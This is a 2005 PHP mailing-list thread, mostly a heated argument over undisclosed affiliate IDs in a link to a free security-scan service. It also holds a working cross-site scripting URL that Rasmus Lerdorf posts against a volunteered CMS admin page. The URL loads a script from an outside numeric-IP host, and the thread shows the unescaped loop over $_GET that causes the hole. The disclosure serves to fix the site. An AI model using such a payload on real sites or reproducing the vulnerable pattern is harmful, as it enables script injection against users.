Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 11:50 PM Ryan A said the following: I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. I am sure that you that it happens that way, but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. That is false. The price and the service are the same for any user. - If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. Why? because they are being open,decent AND honest about it, see the If you buy the book using the links .you are helping to support parts? You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. If I just go in that page or some other page that lists PHP books, pick the ISBN a book of Rasmus Lerdorf (the creator of PHP) and buy it directly in Amazon or somewhere else, I am sure I will be helping PHP development somehow, but the PHP Group would not get a cent for the referral. Still, the links in those pages use the PHP Group Amazon affiliate ID, like the link I suggested before includes my affiliate ID. The books page omits the actual way it helps PHP development and the affiliate ID are hidden in HTML, unlike my message that was in plain text (I do not post in HTML ever). For me, of course there is nothing wrong on the PHP Group help themselves making money with referrals. My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. Nobody is pointing fingers at you because you want to make money, EVERYONE That is all you did! you challenged my credibility by distorting the facts. Of course that bugs me because for 8 years I have been participating in PHP mailing lists helping people leading to solutions to the problems that they pose, and your attitude is misleading people into believing that I am not helping them. Cool, just one question. everytime you help someone are you helping yourself too like the way you tried to help Andy? Have you noticed some of the guys here who unselfishly answer something like: I see what the problem is, use this code instead code here and replace this code here and try reading about this function here url here Now, _thats_ unselfishly helping someone...no gain for the helper except that warm feeling and a clear conciencemaybe even a good nights sleep. Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of
RE: [PHP] Re: Free penetration test
-Original Message- From: Rasmus Lerdorf [mailto:[EMAIL PROTECTED] Sent: Saturday, May 28, 2005 3:48 PM To: Ryan A Cc: php Subject: Re: [PHP] Re: Free penetration test Ryan A wrote: That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. *LOL* Nice comeback Rasmus For those who doesn´t know, Rasmus is danish, and the language is in many ways and words similar to Swedish (Sweden and denmark are neighbour countries) Well, Ryan probably didn´t know this, but that made his posting somewhat funny :-) -- Med venlig hilsen / best regards ComX Networks A/S Kim Madsen Systemudvikler/Systemdeveloper ComX Networks A/S Naverland 31, 2 DK-2600 Glostrup Denmark Phone: +45 70 25 74 74 Fax: +45 70 25 73 74 Web: www.comx.dk E-mail: [EMAIL PROTECTED] -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
For me, of course there is nothing wrong on the PHP Group help themselves making money with referrals. My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. Sweet Mamma, are we *still* arguing about this? Manuel (and whomever else): in general it is A Very Good Idea to declare whenever you have a commercial interest in a solution you provide in a forum such as this one. The problem, whether you agree or not, is that others will ask themselves, Did Manuel (or whomever) supply this link because it is the best solution he (or she) knows of to my problem, or because it is the only one from which he (or she) can earn money? It boils down to a question of motive: are you trying to help, or to use the forum as a method of earning extra income, or both? I tend to think the best of people -- I assume you offered the link in good faith, and you've said as much in posts since. That doesn't negate the fact that the appropriate place to explain your commercial affiliation is at the point where you originally supply such a link. It isn't hard. A simple paragraph similar to the following would be more than adequate: Please note: I have an affiliation relationship with this site. I picked it because it was the best I found when I was looking for solutions to the same problem you're asking about, and share it with you for the very same reason. See? Easy, and no-one questions your motives. To everyone else: many if not most of us take direct commercial benefit from being involved in this forum. I know I do. I ask questions about problems I can't solve on my own. I follow and keep track of solutions to other people's problems that seem innovative and better formulated than my own methods of dealing with those problems. I keep my general skills sharpened by helping people solve problems in areas where my skills are relatively strong. It would be naïve of me not to admit that this has a direct impact on my earning potential. As a group of professionals and semi-professionals (and even those amongst us who are simply learning or developing PHP skills out of general interest), it should be enough to say: Hey, that wasn't the best way to handle this. In future, you'd probably cause less aggravation by doing the following... And then move on. The person doesn't have to agree. You've done your part for peace-as-we-know-it in the PHP forum. If that simply isn't good enough for you in situations such as these, if you have to argue with Manuel (or whomever) until we've all but forgotten what the original freaking question was that began the holy war, then can I make a suggestion? If you happen to be a professional or semi-professional PHP programmer, you might want to think about tagging any and all posts you make to this forum about problems you're having with: I earn money from PHP programming. If you help me with this problem it will have a commercial benefit to me. And, really, wouldn't that be ridiculous? So, seriously, let's move on. At least until the next time someone posts an affiliation link without declaring their commercial interest, and then we can all look forward to having this argument again. Regards, Murray -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hi, This is getting pretty irritating because by now even a stone would have understood what I was trying to say...so either you are playing dumb or you just dont want to understand, that said, this is my last response as I have much better things to do than say the same thing over and over...and over and over etc again. Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? ** Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. ** Thats how affilate systems work, they dont add your commision to their products, they give you a kind of brokers feebut you already know that of course. When you say nothing changes for anybody that follows the link thats a half truth as you would profit if he actually buys something as i have said over and over and.again. ** but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. ** Never said that, all I said (and i'm repeating for the damn 10th time(at least)) that you should just mention that the link you send contains your affiliate code and you gain something if they buy. what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. *** You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. *** Bias against you? You nuts or something? They dont have to say how much they are getting, they just mentioned that they gain from it (the decent thing) Maybe you could have written; clicking the link might help me pay my bills...or is even that too much for you? *** My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. *** First, you are not distracting anybody, you are simply being honest and showing the person you are helping them but you are also conntected with the site and may have a different motive for helping them...let them judge. *** What matters is who wants free help can get free help even if that help provides some benefit to the person that is providing it. If a person that gets free help does not like that whoever provides the help benefits from that too, that person is just being ungrateful and so does not deserve to be helped. *** Arrrgh, that just sounds so wrong I wont even go there. *** Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of Chris Shifflet), some may even gain money indirectly from commission referrals (think of the PHP Group with the books page), etc.. *** Fair enough...and people like me gain knowledge and tips from reading other peoples posts. As for people who gain indirect commission referrals...which is what this is all about... let me put it in a way that might help you understand the whole point of this side-discussion: T H E Y S A Y T H E Y A R E C O N N E C T E D W I T H T H E S I T E in some way...or that they are gaining from the referral (like in the php books link) *** but all my time is taken with all the PHP related projects that I work on and at least hundreds of thousands of users benefit. *** (no comment) :-) End of discussion from my side, if you want to continue to argue about the above please write to yourself (both what I would say and your answer), but what I do suggest is you take some time off and do some thinking... we are not all out to get you...look into the words 'paranoid' and 'megalomaniac' Have a nice day. Regards, Ryan A -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release
Re: [PHP] Re: Free penetration test
Hello, on 05/30/2005 02:21 PM Ryan A said the following: Not really, the service is still the same... true, but what happens if he decides to buy one more scan (49$) from that site or decides to buy a 1 month scanning option ($119) or 1 year scanning ($899)? Does a little birdie get 35% (recurring) of that? ** Read my phrase again: nothing changes for anybody that follows the link, whether or not anybody gains from any referrals. That means that if a person that follows the link that I suggested buys $1000 worth of services or goods, he would still pay $1000 if the link did not contain my referral id. ** Thats how affilate systems work, they dont add your commision to their products, they give you a kind of brokers feebut you already know that of course. When you say nothing changes for anybody that follows the link thats a half truth as you would profit if he actually buys something as i have said over and over and.again. Right, that just confirms what I said. The fact that I could profit or not does not change anything for whoever follows that link because anything that I may gain will not be taken from a loss caused to whoever follows the link. ** but the way you are putting you are confusing other people reading the thread by making them believe that the price would be different if I were to get any commissions. ** Never said that, all I said (and i'm repeating for the damn 10th time(at least)) that you should just mention that the link you send contains your affiliate code and you gain something if they buy. No, I don't agree. As I said many times it would be irrelevant because it would not change anything in the price or the service that was suggested. what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php -- Ummm. this is whats written on the page: If you buy the book using the links on this page, you are helping to support PHP development! Lucky for me, English is my mother tongue but I think even if it was'nt and my IQ was quite a bit lower I would still the idea that if I buy a book using one of those links the site was gaining from it. *** You are not being serious and you are only acting with bias against me, as nowhere in that page it says that when you use those links, the PHP Group (I suppose) may earn 15% on commissions of books sold for their referrals to Amazon. *** Bias against you? You nuts or something? You started attacking my reputation and you are still insulting calling me dishonest, paranoid and megalomaniac. Until you cease your attacks I feel I have the right to defend myself. They dont have to say how much they are getting, they just mentioned that they gain from it (the decent thing) That is false. They do not mention they gain commissions from books sold. I also did not say I gain commissions from referrals, still you insist that I should be crucified for not have done that, while the same omission in the PHP books page is acceptable for you. Therefore, your bias against me is proven. Maybe you could have written; clicking the link might help me pay my bills...or is even that too much for you? As I said and explained many times, that is irrelevant and distracting for the users that may follow my suggestion. *** My point is that it is pretty common to not distract people with the details of who gets what with referrals because it does not change anything for who follows a link with our without the referral id. The price and the service is the same. *** First, you are not distracting anybody, you are simply being honest and showing the person you are helping them I am honest because I explained that when I was asked. Your claim that I am not being honest otherwise, constitutes a direct insult to me. *** Don't be ridiculous! Everybody gains something when he helps somebody on these lists. Sometimes people just feel good for being helpful (think for instance of Richard Lynch), other times people actually gain reputation and are contracted to provide paid jobs (think for instance of Chris Shifflet), some may even gain money indirectly from commission referrals (think of the PHP Group with the books page), etc.. *** Fair enough...and people like me gain knowledge and tips from reading other peoples posts. As for people who gain indirect commission referrals...which is what this is all about... let me put it in a way that might help you understand the whole point of this side-discussion: T H E Y S A Y T H E Y A R E C O N N E C T E D W I T H T H E S I T E in some way...or that they are gaining from the referral (like in the php books link) Go a look in the PHP books and tell me where it is mentioned explicitly that the PHP Group is connected to Amazon and other stores. Can't find that mention? My point is proven. End of discussion
Re: [PHP] Re: Free penetration test
BTW, what do you call to a person that throws stones to another and then runs away to not face the consequences?! Fine, I'll play your game a little longer...but offlist as I think the list has had enough of this, I'm also a bit busy now so expect a reply from me after a few hours. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release Date: 5/30/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hehe, well put...a few things you forgot to write: Ryan A and Rory Browne got so irritated because its like talking to a tree.in english when the tree only understands some other language :-D that they tried to throw in the towel I was so fed up I was going to drop the whole thing because certain well wishers wrote to me too telling me it was hopeless to try to reason or use logic with him...and I pretty much dropped it till he got the hairs at the back of my neck up by saying i like saying things and running.. so am taking it offlist. Consider this link: http://www.somesite.com/section=serverssomething=somethingelsea=bb=ablah=jackbill=gatesgates=evilaffilate=1145more=gibberishclaudia=too_good_for_that_magician_guy imagine someone gave you that kind of a link when you asked for help.pretty good but unless you really searched for it you would miss the affiliate=1145 part...yes, its there..check it out...the affiliate could be smaller too..something like aff=1045 but its lost in the other gibberish of the url... Decency would dictate that the person sending you the link tells you theres an affiliate code there somewhere... thats all I am sayingbut I cant seem to get that message accross to someone...so am pretty much throwing in the towel after I have a few words offlist ;-) But all in all, its been a pretty good few weeks on the list with no one asking which php editor is best or how do you make a script sleep for x seconds or how do i do on the clients machine? Peace all. Cheers, Ryan On 5/31/2005 12:53:26 AM, Rory Browne ([EMAIL PROTECTED]) wrote: Okay Let me summerise what has happened here. 1: The OP asked for a free penetration test. 2: Chris points out that his firm, which provides the suggested service, albeit not free, generally recommends a code audit instead. 3: Manuel Lemos, points out a site that provides a free sample test. The url includes a referer id, which Manuel doesn't see a need to mention. 4: Ryan A, points out that Manuel Lemos is connected to the site, and that his link contains a referer id. He suggests that such facts be explicitly disclosed. 5: Manuel Lemos, responds saying that it is irrelevent, that he gains income from his link to the site. He states that Chris Shifett is connected to the site that he mentions, and that the php group earn money from listing books on their website. 6: Ryan A, and Rory Browne(ie me) explain, that users generally like to know how to treat information they receive. They like to decide for themselves if the information may be biased. They also discredit Manuels statments regarding the php groups listing of amazon books. 7: Manuel repeats step 5, which results in Rory and Ryan repeating step 6. This happens numerous times. It becomes clear, that Manuel will not listen to reason, and will instead repeat the same discredited arguments. During this time, others point out that they too would like to be informed of any potential bias, so that they can decide for themselves if the information is actually biased. 8: Anonymous third parties, suggest via private email, that Manuel cannot be reasoned with. I decide that I'd perfer to make such assertions myself, without relying the judgement of others, and give Manuel the benifit of the doubt. Manuel begins making wild accusations, leading Ryan ane Rory to take the discussion off-list, until such stage that a resolution is found. Let me now summerise the above into an even shorter, and clearer message: Grow up, and get a grip. We don't know you well enough to have some wild conspiracy against you. -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.3.0 - Release Date: 5/30/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Okay: 1: Calm down. You're sensationalism and paranoia make you look like a nutcase.(no offence) 2: That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free Obviously we don't consider it irrelevent. That's all we were trying to say. We're not trying to paint you as some sort of monster. I appreciate your posting of that Link. I've used it. I would also have liked to know that you were affiliated with the site. 3: Relax. This is going away out of proportion. 4: as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! Last time I checked 35% of free, was still free. I therefore put it to you that even if he doesn't sign up and make any payment, you still get 35% of that payment(consisting of $0/Eur0/£0) he didn't make. 5: what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Quote from aforementioned website: If you buy the book using the links on this page, you are helping to support PHP development! . Any intellegent user would be able to decipher from that, that the php group obtains some soft of referal fee, or benifit somehow in your purchase of said books from the php website. 6: I was selling security auditing services, when in fact the only person that doing that in this thread was Chris Shiflet. I know that, you know that, the majority of the people on this list know that. Chris told us that. Personally I'd be pretty pissed off, if Chris posted some website he'd found without mentioning that it was his website. The reason I'm _not_ pissed off with you, is because it wasn't actually your website. I was simply asking you that in future would you mention your _potential_ bias, even if such bias doesn't exist. On 5/28/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 06:46 PM Ryan A said the following: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it That would be irrelevant because nothing changes for the anybody that follows the link with or without the aff code. The service is still free and the service is the same. as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money That is false. If he signs up and tries the free penetration test service that he asked and I suggested, I do not gain anything. Stop deceiving people! -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Stop distorting the facts. You are implying that I acting with malice by stating that I will make money by hiding facts when a) Andy never asked explicitly for a service that the referer would not gain anything b) I am not hiding anything as the affiliate id is quite visible in the URL c) I never denied that the URL contains my affiliate id. If I am acting with malice as you suggest just because I did not mention that the URL contained my affiliate id, what would you say about the PHP group that lists a pile of books in Amazon linked with their affiliate id but they do not mention that fact anywhere in their pages? http://www.php.net/books.php Maybe I am Darth Vader and the PHP Group is the whole dark side of the force. Get real, you are being ridiculous! Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? Yeah, right, you are fighting the dark side of the force to be the good guy that just lives from the air that you breath and nobody else should be allowed to gain anything from referrals unless you warn users that you refer that you are keeping a commission, despite the price is always the same!?! - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would
Re: [PHP] Re: Free penetration test
Hi, Is it bad to give field names the same name as their database counterpart? i.e. In a database the first name column might be known as 'fname'. Should a form field called 'fname' NOT be created? I actually had the same question a little while ago and after doing some reading it left me even more confused... As long as you recognize that you need to filter things appropriately it doesn't really matter. Kind of came to that conclusion after a little while and started to use the ADODB class to filter all user input that goes to the DB... I would appreciate it if you tell me if you have used the class and if you have any warnings/notes/suggestions about how even after using that class I can screw up. If you have written something and you'd like me to take a quick look for any obvious exploits, feel free to mail me privately. If your site requires a login, you can send me a test login if you want so I can dig a bit deeper, otherwise I will still prod it from the outside. I'm not going to hack into your server in any way, just prod your web app That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Thanks, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.2.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Ryan A wrote: That is extremly generious of you as I didnt really think you would have the time considering the amount of projects,books etc you are involved with (yep, I read your CV on your site :-D ), but I would like to take you up on your offer as I am sure to learn something from it...only problem is, the site I have just made is mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
mostly in Swedish...I can give you a star account (Star accounts are the paid accounts) for you to login and test the site, but do you think you could still test it since its mostly in Swedish? Ja, jeg tror jeg kan klare det. Sproget er ret ligegyldigt, jeg checker bare for XSS problemer med et automatisk tool jeg har skrevet. Så det er heller ikke så meget arbejde. Hehehe...its not Swedish but I understand 95+ % of it..and the balance I could guess, Is it Danish? Right now the site is on my local machine, I will be uploading it middle of the coming week after which I'll send you the site details including the login. Thanks again for you time. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.2.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. Regards, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
on 05/23/2005 06:19 AM Andy Pieters said the following: I am looking at where I can get my system tested for penetration. In case someone here would like to have a go This is the url http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/ It is actually a kind of CMS system so if someone gets in, create a page with the cms as proof. You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09src%3D%22http://3423329163/v And you are not doing any input validation either. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? And you are not doing any input validation either. I fixed that. It was only in the part that echoes out the last inputed name if login fails tough because the database abstraction layer I wrote for this application escapes all data it receives. Thank you again With kind regards Andy -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
Andy Pieters wrote: On Friday 27 May 2005 19:11, Rasmus Lerdorf wrote: You have all sorts of problems at that URL. To start with, here is a cross-site scripting hack: http://www.vlaamse-kern.com/yourstore-0.0.2-beta1/admin/?%22%3E%3Cscript%09 src%3D%22http://3423329163/v Hi Thank you! I just saw the potential for tricking users but tell me dear boy. How can I prevent this? Don't display arbitrary key names in hidden fields the way you are. -Rasmus -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
snip Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. /snip reply I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' /reply Dude, calm down, dont get your underwear in a knot, I was not attacking you or saying your intentions were not good or that the service being offered on that page is not exactly what Andy needslet me explain, you wrote: - I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. - fair enough, you could have given him the link the the page directly _without_ your affiliate add on code, but since you did tack your aff code on, I think you should have mentioned it as you get 35% (minimum, for upto a year) if he signs up...not that anybodys bothered if you make money we like to help each other out on the listbut just come out and say it then let the receiver decide if the link is on the level or not. -- If I ever gain anything with the referral, he would not be paying more for whatever services he would order. -- Never said he would be paying extra, but the point is you would be making money off him (not a bad thing again) without his knowledge (bad thing)...if he finds the link really useful I think to show his appreciation he would _make sure_ your affiliate link is tacked there..I would. Another example, I am an affilate of interland, if someone asks about dedicated hosting I could send them there they would join, not pay a cent extra, but i get a commision *without their knowledge* (10% recurring)... am I helping them or myself? - So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly!' - Well, all i can say is, if my little email bugged you, you either get bugged very easily or you know I'm right! (I too sometimes get bugged when people point something out and i am wrong and they are right) and for the record: I never said you are not helping Andy... but if you dont come clean and just add a simple line like: PS: I really like that site so i am an affilate of theirs, my affilate link is on the URL i sent you or something like that people wont have to doubt your motives... Or maybe I am just a goody two shoes who says itand Jay Blanchard when someone asks about templates and template engines and Chris when someone asks about SQL injections...and ...oops, too many names. Cheers, Ryan -- No virus found in this outgoing message. Checked by AVG Anti-Virus. Version: 7.0.322 / Virus Database: 267.0.0 - Release Date: 5/27/2005 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Re: Free penetration test
On 5/27/05, Manuel Lemos [EMAIL PROTECTED] wrote: Hello, on 05/27/2005 02:30 PM Ryan A said the following: You may want to try Security Space services. They perform many types of security checks remotely including penetration tests that may reveal serious vulnerabilities in your servers. Such vulnerabilities include holes, in your server OS version, Web and e-mail servers and even in the PHP version that you may have installed. You can try their no risk test in this page that is free and in a few minutes after the test is request you get a full report by e-mail. http://www.securityspace.com/smysecure/norisk_index.html?refid=1057382149 Umm, you forgot to mention that you are connected to that site and you get a commision for sending them clients, if they sign up. Nothing wrong with getting an affiliate buck mind you, I have a few affiliate accounts around too, but I (and others on the list i have noticed, Jay B for one) mention that we are connected to / own the websites we are sending the person to. I did not forget to mention anything. Andy asked for a free penetration test and that is exactly what he gets going to the page mentioned above. We generally like to know however if there is potential bias in links we are being given. It gives us a better idea how to treat the advice you are giving. I'm sure the site is on the level, but when you don't mention that you potentially get paid for putting that link there(through possible referals), and we find out it makes us suspicious as to why you failed to mention it. OTOH, I think a good few of us here, would like to support each other by choosing services that each other get paid for, provided they're up front with us. Based on other posts here, I don't think you meant to deceive. I'm not attacking, or giving out to you. I'm just saying this FYI. I have requested the free test several times and it was very useful because it brought my attention to aspects that I was not considering, some related to PHP in specific and other related to Internet in general. In all cases it is upto Andy to decide. FYI, if he takes the free penetration test as he asks, I still do not gain anything. If I ever gain anything with the referral, he would not be paying more for whatever services he would order. So, I do not see your point in bugging me for this. If you feel that I am not helping Andy, I would appreciate that you tell me that directly! I wouldn't consider his post to be bugging you(unless he repeats it, or has already posted a similar message before). Personally however I appreciate being made aware of the issue. -- Regards, Manuel Lemos PHP Classes - Free ready to use OOP components written in PHP http://www.phpclasses.org/ PHP Reviews - Reviews of PHP books and other products http://www.phpclasses.org/reviews/ Metastorage - Data object relational mapping layer generator http://www.meta-language.net/metastorage.html -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
RE: [PHP] Re: Free penetration test
Rasmus Lerdorf mailto:[EMAIL PROTECTED]
on Friday, May 27, 2005 4:15 PM said:
He was apparently doing something along the lines of:
foreach($_GET as $key=$val) {
echo EOL
input type=hidden name=$key value=$val
EOL;
}
Probably just a lazyness thing. Generally you will want to keep track
of which query args are actually valid and not just parrot whatever
you get back to the user.
Oh I see.
Or if you are going to do do it this way,
recognize that you have to filter/encode both the query arg names and
the values.
One question. (Because I'm a lame brain when it comes to security as I'm
not good at imagining how things can be exploited):
Is it bad to give field names the same name as their database
counterpart? i.e. In a database the first name column might be known as
